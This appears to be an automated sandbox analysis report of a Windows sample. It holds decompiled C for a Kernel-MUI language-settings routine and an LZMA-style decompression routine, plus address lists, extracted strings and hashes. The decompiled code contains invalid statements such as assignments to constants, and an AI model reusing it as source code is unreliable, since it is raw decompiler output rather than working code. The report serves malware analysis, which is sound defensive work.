					if(_v8 != 0) {
						L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00A91B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00A91B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00A91B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00A91B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00AA4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00ACF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00AD1370(_t276, 0xa64e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00ACBB40(0,  &_v68, _t170);
									if(L00A943C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00ACBB40(_t257,  &_v68, _t243);
								if(L00A943C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00AD1370(_t278, 0xa64e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00AA4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00ACF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00AD1370(_v16, 0xa64e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00ACBB40(_t262,  &_v68, _t244);
								if(L00A943C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00AD1370(_t282, 0xa64e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00ACBB40(_t262,  &_v68, _t201);
							if(L00A943C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00AA4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00ACF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00AD1370(_t280, 0xa64e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00ACBB40(_t267,  &_v68, _t245);
							if(L00A943C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00AD1370(_t284, 0xa64e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00ACBB40(_t267,  &_v68, _t224);
						if(L00A943C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                    0x00a93d3c
                                                                                                    0x00a93d42
                                                                                                    0x00a93d44
                                                                                                    0x00a93d46
                                                                                                    0x00a93d49
                                                                                                    0x00a93d4c
                                                                                                    0x00a93d4f
                                                                                                    0x00a93d52
                                                                                                    0x00a93d55
                                                                                                    0x00a93d58
                                                                                                    0x00a93d5b
                                                                                                    0x00a93d5f
                                                                                                    0x00a93d61
                                                                                                    0x00a93d66
                                                                                                    0x00ae8213
                                                                                                    0x00ae8218
                                                                                                    0x00a94085
                                                                                                    0x00a94088
                                                                                                    0x00a9408e
                                                                                                    0x00a94094
                                                                                                    0x00a9409a
                                                                                                    0x00a940a0
                                                                                                    0x00a940a6
                                                                                                    0x00a940a9
                                                                                                    0x00a940af
                                                                                                    0x00a940b6
                                                                                                    0x00a940bd
                                                                                                    0x00a940bd
                                                                                                    0x00a93d83
                                                                                                    0x00ae821f
                                                                                                    0x00ae8229
                                                                                                    0x00ae8238
                                                                                                    0x00ae8238
                                                                                                    0x00ae823d
                                                                                                    0x00ae823d
                                                                                                    0x00a93da0
                                                                                                    0x00a93daf
                                                                                                    0x00a93db5
                                                                                                    0x00a93dba
                                                                                                    0x00a93dba
                                                                                                    0x00a93dd4
                                                                                                    0x00a93e94
                                                                                                    0x00a93eab
                                                                                                    0x00a93f6d
                                                                                                    0x00a93f84
                                                                                                    0x00a9406b
                                                                                                    0x00a9406b
                                                                                                    0x00a9406e
                                                                                                    0x00a9406e
                                                                                                    0x00a94070
                                                                                                    0x00a94074
                                                                                                    0x00ae8351
                                                                                                    0x00ae8351
                                                                                                    0x00a9407a
                                                                                                    0x00a9407f
                                                                                                    0x00ae835d
                                                                                                    0x00ae8370
                                                                                                    0x00ae8377
                                                                                                    0x00ae8379
                                                                                                    0x00ae837c
                                                                                                    0x00ae837c
                                                                                                    0x00ae835d
                                                                                                    0x00000000
                                                                                                    0x00a9407f
                                                                                                    0x00a93f8a
                                                                                                    0x00a93f8d
                                                                                                    0x00a93f90
                                                                                                    0x00a93f95
                                                                                                    0x00ae830d
                                                                                                    0x00ae830f
                                                                                                    0x00a93f9b
                                                                                                    0x00a93fac
                                                                                                    0x00a93fae
                                                                                                    0x00a93fb1
                                                                                                    0x00a93fb1
                                                                                                    0x00a93fb6
                                                                                                    0x00ae8317
                                                                                                    0x00ae831a
                                                                                                    0x00000000
                                                                                                    0x00a93fbc
                                                                                                    0x00a93fc1
                                                                                                    0x00a93fc9
                                                                                                    0x00a93fd7
                                                                                                    0x00a93fda
                                                                                                    0x00a93fdd
                                                                                                    0x00a94021
                                                                                                    0x00a94021
                                                                                                    0x00a94029
                                                                                                    0x00a94030
                                                                                                    0x00a94044
                                                                                                    0x00a94046
                                                                                                    0x00a94046
                                                                                                    0x00a94044
                                                                                                    0x00a94049
                                                                                                    0x00ae8327
                                                                                                    0x00ae8334
                                                                                                    0x00ae8339
                                                                                                    0x00ae833c
                                                                                                    0x00a9404f
                                                                                                    0x00a9404f
                                                                                                    0x00a9404f
                                                                                                    0x00a94051
                                                                                                    0x00a94056
                                                                                                    0x00a94063
                                                                                                    0x00a94063
                                                                                                    0x00a94068
                                                                                                    0x00000000
                                                                                                    0x00a94068
                                                                                                    0x00a93fdf
                                                                                                    0x00a93fe2
                                                                                                    0x00a93fe4
                                                                                                    0x00a93fe7
                                                                                                    0x00a93fef
                                                                                                    0x00a94003
                                                                                                    0x00a94005
                                                                                                    0x00a94005
                                                                                                    0x00a9400c
                                                                                                    0x00a94013
                                                                                                    0x00a94016
                                                                                                    0x00a94017
                                                                                                    0x00a9401b
                                                                                                    0x00a9401e
                                                                                                    0x00000000
                                                                                                    0x00a9401e
                                                                                                    0x00a93fb6
                                                                                                    0x00a93eb1
                                                                                                    0x00a93eb4
                                                                                                    0x00a93eb7
                                                                                                    0x00a93ebc
                                                                                                    0x00ae82a9
                                                                                                    0x00ae82ab
                                                                                                    0x00a93ec2
                                                                                                    0x00a93ed3
                                                                                                    0x00a93ed5
                                                                                                    0x00a93ed8
                                                                                                    0x00a93ed8
                                                                                                    0x00a93edd
                                                                                                    0x00ae82b3
                                                                                                    0x00ae82b6
                                                                                                    0x00000000
                                                                                                    0x00a93ee3
                                                                                                    0x00a93ee8
                                                                                                    0x00a93eed
                                                                                                    0x00a93ef0
                                                                                                    0x00a93ef3
                                                                                                    0x00a93f02
                                                                                                    0x00a93f05
                                                                                                    0x00a93f08
                                                                                                    0x00ae82c0
                                                                                                    0x00ae82c3
                                                                                                    0x00ae82c5
                                                                                                    0x00ae82c8
                                                                                                    0x00ae82d0
                                                                                                    0x00ae82e4
                                                                                                    0x00ae82e6
                                                                                                    0x00ae82e6
                                                                                                    0x00ae82ed
                                                                                                    0x00ae82f4
                                                                                                    0x00ae82f7
                                                                                                    0x00ae82f8
                                                                                                    0x00ae82fc
                                                                                                    0x00ae82ff
                                                                                                    0x00ae82ff
                                                                                                    0x00a93f0e
                                                                                                    0x00a93f11
                                                                                                    0x00a93f16
                                                                                                    0x00a93f1d
                                                                                                    0x00a93f31
                                                                                                    0x00ae8307
                                                                                                    0x00ae8307
                                                                                                    0x00a93f31
                                                                                                    0x00a93f39
                                                                                                    0x00a93f48
                                                                                                    0x00a93f4d
                                                                                                    0x00a93f50
                                                                                                    0x00a93f50
                                                                                                    0x00a93f53
                                                                                                    0x00a93f58
                                                                                                    0x00a93f65
                                                                                                    0x00a93f65
                                                                                                    0x00a93f6a
                                                                                                    0x00000000
                                                                                                    0x00a93f6a
                                                                                                    0x00a93edd
                                                                                                    0x00a93dda
                                                                                                    0x00a93ddd
                                                                                                    0x00a93de0
                                                                                                    0x00a93de5
                                                                                                    0x00ae8245
                                                                                                    0x00a93deb
                                                                                                    0x00a93df7
                                                                                                    0x00a93dfc
                                                                                                    0x00a93dfe
                                                                                                    0x00a93e01
                                                                                                    0x00a93e01
                                                                                                    0x00a93e06
                                                                                                    0x00ae824d
                                                                                                    0x00ae824f
                                                                                                    0x00ae8254
                                                                                                    0x00000000
                                                                                                    0x00a93e0c
                                                                                                    0x00a93e11
                                                                                                    0x00a93e16
                                                                                                    0x00a93e19
                                                                                                    0x00a93e29
                                                                                                    0x00a93e2c
                                                                                                    0x00a93e2f
                                                                                                    0x00ae825c
                                                                                                    0x00ae825f
                                                                                                    0x00ae8261
                                                                                                    0x00ae8264
                                                                                                    0x00ae826c
                                                                                                    0x00ae8280
                                                                                                    0x00ae8282
                                                                                                    0x00ae8282
                                                                                                    0x00ae8289
                                                                                                    0x00ae8290
                                                                                                    0x00ae8293
                                                                                                    0x00ae8294
                                                                                                    0x00ae8298
                                                                                                    0x00ae829b
                                                                                                    0x00ae829b
                                                                                                    0x00a93e35
                                                                                                    0x00a93e38
                                                                                                    0x00a93e3d
                                                                                                    0x00a93e44
                                                                                                    0x00a93e58
                                                                                                    0x00ae82a3
                                                                                                    0x00ae82a3
                                                                                                    0x00a93e58
                                                                                                    0x00a93e60
                                                                                                    0x00a93e6f
                                                                                                    0x00a93e74
                                                                                                    0x00a93e77
                                                                                                    0x00a93e77
                                                                                                    0x00a93e7a
                                                                                                    0x00a93e7f
                                                                                                    0x00a93e8c
                                                                                                    0x00a93e8c
                                                                                                    0x00a93e91
                                                                                                    0x00000000
                                                                                                    0x00a93e91

                                                                                                    Strings
                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 00A93DC0
                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 00A93F70
                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00A93E97
                                                                                                    • WindowsExcludedProcs, xrefs: 00A93D6F
                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 00A93D8C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                    • API String ID: 0-258546922
                                                                                                    • Opcode ID: aaa2e1a6187c3d83e589b70246ab81ca1c5da32a119e06d607cce1f72ab6ab4f
                                                                                                    • Instruction ID: a9ce9e124fa62d6dad97a78197eec463ad6109f2325fbda31c4488c8fb2c90d9
                                                                                                    • Opcode Fuzzy Hash: aaa2e1a6187c3d83e589b70246ab81ca1c5da32a119e06d607cce1f72ab6ab4f
                                                                                                    • Instruction Fuzzy Hash: 21F12B72E00659ABCF11DF99C981EEEB7F9FF08750F15006AE505AB251D7359E01CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406131, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 98%
                                                                                                    			E00406131() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600);
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40));
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
